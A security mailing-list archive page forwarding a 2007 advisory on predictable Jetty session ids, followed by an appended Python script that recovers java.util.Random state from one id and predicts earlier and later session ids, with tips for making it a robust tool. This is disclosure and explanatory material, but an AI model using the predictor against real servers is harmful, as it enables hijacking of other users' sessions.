     ARCHIVE :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: [NEWS] Jetty Session ID Prediction Vulnerability



Besides describing the vulnerability in Jetty itself, NGS also wrote a general paper on
the insecurity of standard PRNGs:
http://www.ngssoftware.com/research/papers/Randomness.pdf



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Wednesday, February 07, 2007 11:57 AM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Jetty Session ID Prediction Vulnerability
> 
> - - - - - - - - -
> 
> 
> 
> Jetty Session ID Prediction Vulnerability 
> 
> 
> 
> Different versions of Jetty, the popular java web server, are 
> vulnerable to a session id prediction attack. 
> 
> 
> Vulnerable Systems: 
>  * Jetty versions prior to 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3 
> 
> Immune Systems: 
>  * Jetty versions 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3. 
> 
> Jetty uses java.util.Random to generate session ids. The 
> internal state of this generator can be easily discovered, 
> leading to an attacker being able to hijack existing and 
> future sessions. 
> 
> java.util.Random implements a linear congruential generator, 
> of the following form: 
>     synchronized protected int next(int bits) { 
>         seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1); 
>         return (int)(seed >>> (48 - bits)); 
>     } 
> 
> Jetty generates a 64-bit session id by generating two 32-bit 
> numbers in this way, so we end up with an encoded 64-bit 
> integer. By decoding the integer and splitting it into its 
> two component 32-bit integers, we can easily brute-force the 
> generator's internal state. Once the state is discovered, the 
> generator can be run both forwards and backwards, so an 
> attacker can determine previously generated session ids, as 
> well as session ids that have not yet been generated. This 
> allows the attacker to hijack any existing session, and 
> perform any actions that the original user of the session 
> could perform. Obviously the severity of this issue varies 
> from application to application but we believe it warrants at 
> least a "high" risk rating. 
> 
> NGS have developed proof of concept code for this issue that 
> implements a session predictor for this bug. It takes a 
> session id as input and outputs candidates for the next 5 and 
> previous 5 session ids. It is necessary to output 7 candidate 
> session ids for each iteration because Jetty encodes the 
> session id in a number base from 30 to 36 depending on the 
> millisecond in which the session id was generated. The 
> underlying 64-bit integer is the same, just represented in 
> bases 30-36. 
> 
> Here is some example output: 
> H:\jetty_rand\Debug>jetty_rand.exe g4sse9e7fs5ee 
> Radix: 30 
> Found seed: 5346772124980067 
> 
> Session -5: 
> 27s4jsk03074k 
> 1gbb661e0l6mp 
> 11ctqbu24shqo 
> nqqa46cv6ovh 
> h4xlr7d8n98c 
> cg9x29g6vfna 
> 9568uhp0c7yw 
> 
> Session -4: 
> 586o97hbtkkis 
> 3h9o0c9eglm5q 
> 2dpgen12bekgo 
> 1mf3ar81r4e7d 
> 15vq2mdv83nmo 
> t13aedmjm4ts 
> lamwq2jurlzs 
> 
> Session -3: 
> c2kqln033ior 
> 8d98tft18mgj 
> 5u715san1m0b 
> 47rifnwhompl 
> 31pb1t2496ef 
> 27mbqm91n0gc 
> 1mksf8xjn6kr 
> 
> Session -2: 
> h5n7ft13ak1nr 
> biif83e4tlq37 
> 7tj3f6tclak5h 
> 5fpk27ulvu2nu 
> 3s5vpubx7ekc9 
> 2om684eem9iy2 
> 1xf0lar1nqpwx 
> 
> Session -1: 
> 66isdajhm658g 
> 463l7trqe65oo 
> 2rodl8h2bjkb4 
> 1wdl0j3wqr6tj 
> 1d3hc9k0gm9ja 
> y8hj85q65rxq 
> p49erbpgioo4 
> 
> Session 0: 
> g4sse9e7fs5ee 
> as3iaiqcjo82g 
> 7eeb56egthkrm 
> 54w87w5wtpwfk 
> 3kdimj6vemoce 
> 2iybbcyacjqk9 
> 1t9qijf82uk52 
> 
> The issue affects a great many products that are based on 
> Jetty, such as 
> Apache Geronimo: 
> http://geronimo.apache.org/ 
> 
> The latest version (2.0) of Geronimo is not vulnerable to this issue. 
> Version 1.1 and prior are vulnerable however, and this issue 
> can be used to hijack a session to the administrative console. 
> 
> A further 98 projects based on Jetty are listed on the Jetty 
> website at: 
> http://www.mortbay.com/powered.html 
> 
> Fix: 
> This issue was fixed in the source code on the 22nd of 
> November 2006, less than 6 hours after it was reported. The 
> issue is fixed in released versions 4.2.27, 5.1.12, 6.0.2 and 
> 6.1.0pre3. 
> 
> The changes can be viewed here: 
> http://fisheye.codehaus.org/changelog/jetty/?cs=1274 
> 
> 
> Additional Information: 
> The information has been provided by NGSSoftware Insight 
> Security Research <mailto:nisr@xxxxxxxxxxxxxxx>. 
> 
> 
> ==============================================================

And one more:



> -----Original Message-----
> From: Michal Zalewski [mailto:lcamtuf@xxxxxxxxxxxx] 
> Sent: Tuesday, February 06, 2007 11:21 AM
> To: Amit Klein
> Cc: NGSSoftware Insight Security Research; bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Re: Jetty Session ID Prediction
> 
> On Tue, 6 Feb 2007, Amit Klein wrote:
> 
> > I don't think that the method described in the paper you referenced
> > above is applicable as-is [...] (only 32 bits out of the 48 are known).
> 
> There are attacks published for just about any variant of LCG imaginable,
> including ones with missing MSB/LSB output bits, etc. But I had a chance
> to talk to David Litchfield and Chris Anley off the list, and they do use
> an algorithmic approach, not brute force - that was simply a poor choice
> of words.
> 
> /mz
> 
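A worked version of the attack the advisory describes, added here as an example; it is neither NGS's jetty_rand tool nor Jetty's code. It re-implements the java.util.Random step quoted in the advisory, models the id format the way the advisory describes it (one 64-bit value from two next(32) calls, printed with Long.toString in radix 30 + millis % 7), recovers the 48-bit state from the two 32-bit halves, and walks the generator backwards and forwards. Two things are assumptions because the advisory does not spell them out: that the two halves are combined exactly as nextLong() does, and that the value is written without a sign. Each next(32) call exposes the top 32 bits of the 48-bit state, so only the low 16 bits of the first state are unknown; this example simply tries all 65536 of them against the second output, which takes well under a second in Python. NGS say they used an algorithmic method rather than a search (see Zalewski's note above); the search is just the shortest way to show why 48 bits of state behind two 32-bit outputs is not a secret. The ids issued in the demo come from a seed of my own choosing; the advisory's sample id is used only to check that its radix-30 and radix-32 spellings decode to the same 64-bit integer, which they do.

```python
# Added example: recover java.util.Random's 48-bit state from one Jetty-style
# session id and predict neighbouring ids.  Not NGS's tool and not Jetty's code.

A = 0x5DEECE66D                  # java.util.Random multiplier
C = 0xB                          # java.util.Random increment
MASK48 = (1 << 48) - 1
MASK64 = (1 << 64) - 1
A_INV = pow(A, -1, 1 << 48)      # A is odd, so it is invertible mod 2^48
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"   # Long.toString digit set

def to_signed32(x):
    return x - (1 << 32) if x & 0x80000000 else x

def step_forward(state):
    return (state * A + C) & MASK48

def step_back(state):
    # Exact inverse of step_forward: state = (next - C) * A^-1 mod 2^48
    return ((state - C) * A_INV) & MASK48

def long_from_state(state):
    """Advance two steps; return the nextLong() they produce and the new state.
    Java: ((long) next(32) << 32) + next(32), both halves as signed ints."""
    s1 = step_forward(state)
    s2 = step_forward(s1)
    return ((to_signed32(s1 >> 16) << 32) + to_signed32(s2 >> 16)) & MASK64, s2

class JavaRandom:
    """The java.util.Random core quoted in the advisory."""
    def __init__(self, seed):
        self.seed = (seed ^ A) & MASK48       # Random(long) scrambles the seed

    def next(self, bits):
        self.seed = step_forward(self.seed)
        return self.seed >> (48 - bits)       # top `bits` bits of the 48-bit state

    def next_long(self):
        value, self.seed = long_from_state(self.seed)
        return value

def to_radix(n, radix):
    digits = []
    while True:
        n, d = divmod(n, radix)
        digits.append(DIGITS[d])
        if n == 0:
            return "".join(reversed(digits))

def jetty_like_session_id(rng, millis):
    """Assumed id format: one 64-bit nextLong() written in radix 30 + millis % 7."""
    return to_radix(rng.next_long(), 30 + millis % 7)

def candidates(value):
    """The seven strings one 64-bit value can appear as (one per radix 30..36)."""
    return [to_radix(value, radix) for radix in range(30, 37)]

def split_next_long(value):
    """Undo the signed addition in nextLong(): return the two raw next(32) outputs."""
    lo = value & 0xFFFFFFFF
    hi = ((value - to_signed32(lo)) & MASK64) >> 32
    return hi, lo

def recover_state(out1, out2):
    """Two consecutive next(32) outputs -> the 48-bit state after the second.
    Each output is the top 32 bits of the state, so only 16 bits are unknown."""
    for low16 in range(1 << 16):
        s2 = step_forward((out1 << 16) | low16)
        if s2 >> 16 == out2:
            return s2      # a chance false match (~2^-16) is exposed by a third output
    return None

def predict(session_id, before=5, after=5):
    """(radix, {offset: 64-bit value}) for the ids around session_id, or None.
    The radix is unknown, so each of 30..36 is tried until the LCG state fits."""
    for radix in range(30, 37):
        try:
            value = int(session_id, radix)
        except ValueError:                 # a digit outside this radix
            continue
        state = recover_state(*split_next_long(value))
        if state is None:
            continue
        for _ in range(2 * (before + 1)):  # rewind to just before session -before
            state = step_back(state)
        values = {}
        for k in range(-before, after + 1):
            values[k], state = long_from_state(state)
        return radix, values
    return None

if __name__ == "__main__":
    # Constructed scenario: a server seeded with an arbitrary value issues ten ids
    # at consecutive milliseconds and the attacker sees only the sixth one.
    server = JavaRandom(0xC0FFEE)
    issued = [jetty_like_session_id(server, ms) for ms in range(1000, 1010)]
    radix, values = predict(issued[5], before=5, after=4)
    for k in sorted(values):
        hit = "hit" if issued[5 + k] in candidates(values[k]) else "MISS"
        print(f"radix {radix}, session {k:+d}: {candidates(values[k])[0]} {hit}")
```

Running the file prints the recovered radix and one spelling per neighbouring session, marking whether the id the server really issued is among the seven candidates. Two caveats a real tool should handle: recover_state can hit a chance match with probability of roughly 2^-16 per radix tried, so a second observed id should be used to confirm the candidate state by stepping forward before acting on a prediction; and feeding the advisory's own g4sse9e7fs5ee to predict() will reproduce the advisory's neighbouring ids only if Jetty combined the two 32-bit outputs the way nextLong() does, which is the assumption stated above rather than something the advisory confirms.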



 




Copyright © Lexa Software, 1996-2009.